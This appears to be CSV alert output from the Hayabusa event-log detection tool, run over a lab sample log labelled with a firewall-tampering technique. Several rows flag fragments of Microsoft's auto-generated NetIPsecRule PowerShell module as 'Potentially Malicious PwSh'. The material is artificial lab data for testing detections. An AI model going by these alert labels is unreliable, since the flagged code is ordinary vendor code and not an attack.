'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName ))",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName ))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 